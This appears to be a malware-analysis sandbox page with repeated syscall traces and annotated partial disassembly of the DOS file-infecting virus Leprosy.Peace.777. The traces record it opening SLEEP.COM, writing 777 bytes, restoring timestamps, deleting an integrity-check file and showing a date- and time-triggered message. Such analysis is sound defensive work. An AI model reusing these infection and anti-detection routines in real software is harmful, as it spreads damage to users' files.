Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Peace.777.c


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:19.103254336Z 78 PC: 12b5c | Find first file
2018-12-17T23:00:19.105817553Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
; Disassembly window shown after the "Get date" call; its first instruction
; (`cmp dh, 0xc`) is fused onto the trace row directly above.
; Register meanings follow the DOS INT 21h conventions (Get Date: DH = month, DL = day).
; Branch targets outside this window are not visible here.
0x12b71: jne 0x12b7a  ; month != 12 -> continue with the file search
0x12b73: cmp dl, 5  ; DL = day of month
0x12b76: jne 0x12b7a  ; day != 5 -> continue with the file search
0x12b78: jmp 0x12bf0  ; date is 5 December: separate path at 0x12bf0 (not shown in this window)
0x12b7a: mov ah, 0x4e  ; AH=4Eh: Find First File
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si  ; DX = SI + 0x11a, pointer to the search filespec; SI looks like a base offset (TODO confirm)
0x12b81: xor cx, cx  ; CX=0: attribute mask, normal files only
0x12b83: int 0x21
0x12b85: jb 0x12bc0  ; CF set = no match / error -> 0x12bc0 (not shown in this window)
0x12b87: mov ax, 0x3d02  ; AH=3Dh open file, AL=02h read/write access
0x12b8a: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e: filename field of the default DTA (assumes the DTA was not moved)
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e  ; NOTE(review): DX was loaded with 0x9e above; the purpose of this compare is unclear from this window
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax  ; save AX (the file handle on success); no carry check on the open is visible here
0x12b99: mov ax, 0x5700  ; AH=57h, AL=00h: get file date and time
0x12b9c: mov bx, word ptr [si + 0x1fd]  ; BX = saved handle
0x12ba0: int 0x21
2018-12-17T23:00:19.109223277Z 78 PC: 12b85 | Find first file
2018-12-17T23:00:19.116269935Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:00:19.123463709Z 87 PC: 12ba2 | Get or set file date and time
2018-12-17T23:00:19.125818686Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-17T23:00:19.142160951Z 87 PC: 12be1 | Get or set file date and time
2018-12-17T23:00:19.145355541Z 62 PC: 12bbf | Close file
2018-12-17T23:00:19.156580756Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-17T23:00:19.163748155Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
; Disassembly window shown after the "Get time" call; its first instruction
; (`cmp dh, 0x1e`) is fused onto the trace row directly above.
; Per the DOS Get Time convention DH holds the seconds value.
0x12c0c: jg 0x12c12  ; seconds > 30 -> message path at 0x12c12
0x12c0e: mov ah, 0x4c  ; AH=4Ch: terminate; AL (the return code) is not set here
0x12c10: int 0x21
0x12c12: mov ah, 9  ; AH=09h: display '$'-terminated string
0x12c14: mov dx, 0x1cb  ; DX = offset of the message text
0x12c17: int 0x21
0x12c19: mov ah, 0x4c  ; terminate after the message; AL is again left as-is, so the logged return code is whatever AL held
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c  ; a further terminate sequence
0x12c1f: int 0x21
; NOTE(review): the lines below are linear disassembly past the terminate calls.
; INT 2Fh with AX=B7xxh looks like the DOS APPEND multiplex interface; this is
; presumably not part of the traced path. Confirm before treating it as sample behaviour.
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-17T23:00:19.166136587Z 9 PC: 12c19 | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim BlueC:\�.�')
2018-12-17T23:00:19.17319355Z 76 PC: 12c1d | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13495,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:22.274977372Z 78 PC: 12b5c | Find first file
2018-12-25T12:38:22.27870784Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
; Disassembly window shown after the "Get date" call; its first instruction
; (`cmp dh, 0xc`) is fused onto the trace row directly above.
; Register meanings follow the DOS INT 21h conventions (Get Date: DH = month, DL = day).
; Branch targets outside this window are not visible here.
0x12b71: jne 0x12b7a  ; month != 12 -> continue with the file search
0x12b73: cmp dl, 5  ; DL = day of month
0x12b76: jne 0x12b7a  ; day != 5 -> continue with the file search
0x12b78: jmp 0x12bf0  ; date is 5 December: separate path at 0x12bf0 (not shown in this window)
0x12b7a: mov ah, 0x4e  ; AH=4Eh: Find First File
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si  ; DX = SI + 0x11a, pointer to the search filespec; SI looks like a base offset (TODO confirm)
0x12b81: xor cx, cx  ; CX=0: attribute mask, normal files only
0x12b83: int 0x21
0x12b85: jb 0x12bc0  ; CF set = no match / error -> 0x12bc0 (not shown in this window)
0x12b87: mov ax, 0x3d02  ; AH=3Dh open file, AL=02h read/write access
0x12b8a: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e: filename field of the default DTA (assumes the DTA was not moved)
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e  ; NOTE(review): DX was loaded with 0x9e above; the purpose of this compare is unclear from this window
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax  ; save AX (the file handle on success); no carry check on the open is visible here
0x12b99: mov ax, 0x5700  ; AH=57h, AL=00h: get file date and time
0x12b9c: mov bx, word ptr [si + 0x1fd]  ; BX = saved handle
0x12ba0: int 0x21
2018-12-25T12:38:22.281567631Z 78 PC: 12b85 | Find first file
2018-12-25T12:38:22.288432558Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:22.296702803Z 87 PC: 12ba2 | Get or set file date and time
2018-12-25T12:38:22.298745989Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:38:22.3148476Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:38:22.316222606Z 62 PC: 12bbf | Close file
2018-12-25T12:38:22.330291936Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-25T12:38:22.335089203Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
; Disassembly window shown after the "Get time" call; its first instruction
; (`cmp dh, 0x1e`) is fused onto the trace row directly above.
; Per the DOS Get Time convention DH holds the seconds value.
0x12c0c: jg 0x12c12  ; seconds > 30 -> message path at 0x12c12
0x12c0e: mov ah, 0x4c  ; AH=4Ch: terminate; AL (the return code) is not set here
0x12c10: int 0x21
0x12c12: mov ah, 9  ; AH=09h: display '$'-terminated string
0x12c14: mov dx, 0x1cb  ; DX = offset of the message text
0x12c17: int 0x21
0x12c19: mov ah, 0x4c  ; terminate after the message; AL is again left as-is, so the logged return code is whatever AL held
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c  ; a further terminate sequence
0x12c1f: int 0x21
; NOTE(review): the lines below are linear disassembly past the terminate calls.
; INT 2Fh with AX=B7xxh looks like the DOS APPEND multiplex interface; this is
; presumably not part of the traced path. Confirm before treating it as sample behaviour.
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-25T12:38:22.337527595Z 76 PC: 12c12 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13495,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:23.018608648Z 78 PC: 12b5c | Find first file
2018-12-25T12:38:23.021106085Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
; Disassembly window shown after the "Get date" call; its first instruction
; (`cmp dh, 0xc`) is fused onto the trace row directly above.
; Register meanings follow the DOS INT 21h conventions (Get Date: DH = month, DL = day).
; Branch targets outside this window are not visible here.
0x12b71: jne 0x12b7a  ; month != 12 -> continue with the file search
0x12b73: cmp dl, 5  ; DL = day of month
0x12b76: jne 0x12b7a  ; day != 5 -> continue with the file search
0x12b78: jmp 0x12bf0  ; date is 5 December: separate path at 0x12bf0 (not shown in this window)
0x12b7a: mov ah, 0x4e  ; AH=4Eh: Find First File
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si  ; DX = SI + 0x11a, pointer to the search filespec; SI looks like a base offset (TODO confirm)
0x12b81: xor cx, cx  ; CX=0: attribute mask, normal files only
0x12b83: int 0x21
0x12b85: jb 0x12bc0  ; CF set = no match / error -> 0x12bc0 (not shown in this window)
0x12b87: mov ax, 0x3d02  ; AH=3Dh open file, AL=02h read/write access
0x12b8a: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e: filename field of the default DTA (assumes the DTA was not moved)
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e  ; NOTE(review): DX was loaded with 0x9e above; the purpose of this compare is unclear from this window
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax  ; save AX (the file handle on success); no carry check on the open is visible here
0x12b99: mov ax, 0x5700  ; AH=57h, AL=00h: get file date and time
0x12b9c: mov bx, word ptr [si + 0x1fd]  ; BX = saved handle
0x12ba0: int 0x21
2018-12-25T12:38:23.023318866Z 78 PC: 12b85 | Find first file
2018-12-25T12:38:23.029386218Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:23.036631542Z 87 PC: 12ba2 | Get or set file date and time
2018-12-25T12:38:23.038476695Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:38:23.052009961Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:38:23.056196591Z 62 PC: 12bbf | Close file
2018-12-25T12:38:23.063549061Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-25T12:38:23.071746917Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
; Disassembly window shown after the "Get time" call; its first instruction
; (`cmp dh, 0x1e`) is fused onto the trace row directly above.
; Per the DOS Get Time convention DH holds the seconds value.
0x12c0c: jg 0x12c12  ; seconds > 30 -> message path at 0x12c12
0x12c0e: mov ah, 0x4c  ; AH=4Ch: terminate; AL (the return code) is not set here
0x12c10: int 0x21
0x12c12: mov ah, 9  ; AH=09h: display '$'-terminated string
0x12c14: mov dx, 0x1cb  ; DX = offset of the message text
0x12c17: int 0x21
0x12c19: mov ah, 0x4c  ; terminate after the message; AL is again left as-is, so the logged return code is whatever AL held
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c  ; a further terminate sequence
0x12c1f: int 0x21
; NOTE(review): the lines below are linear disassembly past the terminate calls.
; INT 2Fh with AX=B7xxh looks like the DOS APPEND multiplex interface; this is
; presumably not part of the traced path. Confirm before treating it as sample behaviour.
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-25T12:38:23.07424232Z 76 PC: 12c12 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":13495,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:24.308918414Z 78 PC: 12b5c | Find first file
2018-12-25T12:38:24.311434178Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
; Disassembly window shown after the "Get date" call; its first instruction
; (`cmp dh, 0xc`) is fused onto the trace row directly above.
; Register meanings follow the DOS INT 21h conventions (Get Date: DH = month, DL = day).
; Branch targets outside this window are not visible here.
0x12b71: jne 0x12b7a  ; month != 12 -> continue with the file search
0x12b73: cmp dl, 5  ; DL = day of month
0x12b76: jne 0x12b7a  ; day != 5 -> continue with the file search
0x12b78: jmp 0x12bf0  ; date is 5 December: separate path at 0x12bf0 (not shown in this window)
0x12b7a: mov ah, 0x4e  ; AH=4Eh: Find First File
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si  ; DX = SI + 0x11a, pointer to the search filespec; SI looks like a base offset (TODO confirm)
0x12b81: xor cx, cx  ; CX=0: attribute mask, normal files only
0x12b83: int 0x21
0x12b85: jb 0x12bc0  ; CF set = no match / error -> 0x12bc0 (not shown in this window)
0x12b87: mov ax, 0x3d02  ; AH=3Dh open file, AL=02h read/write access
0x12b8a: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e: filename field of the default DTA (assumes the DTA was not moved)
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e  ; NOTE(review): DX was loaded with 0x9e above; the purpose of this compare is unclear from this window
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax  ; save AX (the file handle on success); no carry check on the open is visible here
0x12b99: mov ax, 0x5700  ; AH=57h, AL=00h: get file date and time
0x12b9c: mov bx, word ptr [si + 0x1fd]  ; BX = saved handle
0x12ba0: int 0x21
2018-12-25T12:38:24.314168709Z 78 PC: 12b85 | Find first file
2018-12-25T12:38:24.320341574Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:24.3272551Z 87 PC: 12ba2 | Get or set file date and time
2018-12-25T12:38:24.329786782Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:38:24.34451874Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:38:24.346465101Z 62 PC: 12bbf | Close file
2018-12-25T12:38:24.362329826Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-25T12:38:24.369769857Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
; Disassembly window shown after the "Get time" call; its first instruction
; (`cmp dh, 0x1e`) is fused onto the trace row directly above.
; Per the DOS Get Time convention DH holds the seconds value.
0x12c0c: jg 0x12c12  ; seconds > 30 -> message path at 0x12c12
0x12c0e: mov ah, 0x4c  ; AH=4Ch: terminate; AL (the return code) is not set here
0x12c10: int 0x21
0x12c12: mov ah, 9  ; AH=09h: display '$'-terminated string
0x12c14: mov dx, 0x1cb  ; DX = offset of the message text
0x12c17: int 0x21
0x12c19: mov ah, 0x4c  ; terminate after the message; AL is again left as-is, so the logged return code is whatever AL held
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c  ; a further terminate sequence
0x12c1f: int 0x21
; NOTE(review): the lines below are linear disassembly past the terminate calls.
; INT 2Fh with AX=B7xxh looks like the DOS APPEND multiplex interface; this is
; presumably not part of the traced path. Confirm before treating it as sample behaviour.
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-25T12:38:24.37230478Z 9 PC: 12c19 | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim BlueC:\�.�')
2018-12-25T12:38:24.379463237Z 76 PC: 12c1d | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":31,"TimeBased":true,"OriginalID":13495,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:25.754479154Z 78 PC: 12b5c | Find first file
2018-12-25T12:38:25.756433471Z 42 PC: 12b6e | Get date 0x12b6e: cmp dh, 0xc
; Disassembly window shown after the "Get date" call; its first instruction
; (`cmp dh, 0xc`) is fused onto the trace row directly above.
; Register meanings follow the DOS INT 21h conventions (Get Date: DH = month, DL = day).
; Branch targets outside this window are not visible here.
0x12b71: jne 0x12b7a  ; month != 12 -> continue with the file search
0x12b73: cmp dl, 5  ; DL = day of month
0x12b76: jne 0x12b7a  ; day != 5 -> continue with the file search
0x12b78: jmp 0x12bf0  ; date is 5 December: separate path at 0x12bf0 (not shown in this window)
0x12b7a: mov ah, 0x4e  ; AH=4Eh: Find First File
0x12b7c: mov dx, 0x11a
0x12b7f: add dx, si  ; DX = SI + 0x11a, pointer to the search filespec; SI looks like a base offset (TODO confirm)
0x12b81: xor cx, cx  ; CX=0: attribute mask, normal files only
0x12b83: int 0x21
0x12b85: jb 0x12bc0  ; CF set = no match / error -> 0x12bc0 (not shown in this window)
0x12b87: mov ax, 0x3d02  ; AH=3Dh open file, AL=02h read/write access
0x12b8a: mov dx, 0x9e  ; 0x9e = 0x80 + 0x1e: filename field of the default DTA (assumes the DTA was not moved)
0x12b8d: int 0x21
0x12b8f: cmp dx, 0x10e  ; NOTE(review): DX was loaded with 0x9e above; the purpose of this compare is unclear from this window
0x12b93: je 0x12bb2
0x12b95: mov word ptr [si + 0x1fd], ax  ; save AX (the file handle on success); no carry check on the open is visible here
0x12b99: mov ax, 0x5700  ; AH=57h, AL=00h: get file date and time
0x12b9c: mov bx, word ptr [si + 0x1fd]  ; BX = saved handle
0x12ba0: int 0x21
2018-12-25T12:38:25.757974184Z 78 PC: 12b85 | Find first file
2018-12-25T12:38:25.761790898Z 61 PC: 12b8f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:38:25.766243022Z 87 PC: 12ba2 | Get or set file date and time
2018-12-25T12:38:25.767298476Z 64 PC: 12bd9 | Write file or device (Write 777 bytes on handle 5)
2018-12-25T12:38:25.782067863Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:38:25.783726199Z 62 PC: 12bbf | Close file
2018-12-25T12:38:25.792336734Z 65 PC: 12bed | Delete file (Filename = 'chklist.ms')
2018-12-25T12:38:25.79876504Z 44 PC: 12c09 | Get time 0x12c09: cmp dh, 0x1e
; Disassembly window shown after the "Get time" call; its first instruction
; (`cmp dh, 0x1e`) is fused onto the trace row directly above.
; Per the DOS Get Time convention DH holds the seconds value.
0x12c0c: jg 0x12c12  ; seconds > 30 -> message path at 0x12c12
0x12c0e: mov ah, 0x4c  ; AH=4Ch: terminate; AL (the return code) is not set here
0x12c10: int 0x21
0x12c12: mov ah, 9  ; AH=09h: display '$'-terminated string
0x12c14: mov dx, 0x1cb  ; DX = offset of the message text
0x12c17: int 0x21
0x12c19: mov ah, 0x4c  ; terminate after the message; AL is again left as-is, so the logged return code is whatever AL held
0x12c1b: int 0x21
0x12c1d: mov ah, 0x4c  ; a further terminate sequence
0x12c1f: int 0x21
; NOTE(review): the lines below are linear disassembly past the terminate calls.
; INT 2Fh with AX=B7xxh looks like the DOS APPEND multiplex interface; this is
; presumably not part of the traced path. Confirm before treating it as sample behaviour.
0x12c21: mov ax, 0xb702
0x12c24: int 0x2f
0x12c26: cmp ax, 0xffff
0x12c29: jne 0x12c3b
0x12c2b: mov ax, 0xb706
0x12c2e: int 0x2f
0x12c30: mov word ptr [0x393], bx
0x12c34: xor bx, bx
0x12c36: mov ax, 0xb707
2018-12-25T12:38:25.800840205Z 9 PC: 12c19 | Display string (String= ' Let's have Peace in S.A. - from Ol' Jim BlueC:\�.�')
2018-12-25T12:38:25.80708826Z 76 PC: 12c1d | Terminate with return code (Return code = '36')